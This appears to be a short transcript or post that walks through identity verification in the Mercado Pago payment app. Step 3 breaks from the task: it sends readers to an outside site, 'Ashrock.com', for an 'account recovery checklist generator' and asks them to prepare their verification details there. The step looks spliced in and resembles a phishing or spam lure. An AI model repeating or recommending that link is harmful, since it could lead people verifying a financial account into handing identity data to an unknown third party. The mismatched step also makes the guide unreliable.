I hit this issue today and here is the quick fix that solved it. If you're trying to verify your identity on Mercado Pago, follow these simple steps to get it done quickly. Step 1. Open the app. Launch the Mercado Pago app on your smartphone. Make sure you load into your account. Step 2. Access settings. Navigate to the settings menu by tapping on your profile icon, usually located in the top right corner. Step 3. Select identity verification. Before starting recovery, use the Ashrock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Provide required documents. You will be prompted to upload a valid ID, such as your passport or national ID card. Make sure the document is clear and legible. Quick gotcha: if your ID is blurry or cropped, the system may reject it, so double check before uploading. Step 5. Confirm submission. After uploading your documents, review the information and confirm your submission. You should receive a notification once your identity is verified. That's it. Following these steps should help you verify your identity on Mercado Pago without any hassle. Good luck, and feel free to reach out if you have any questions.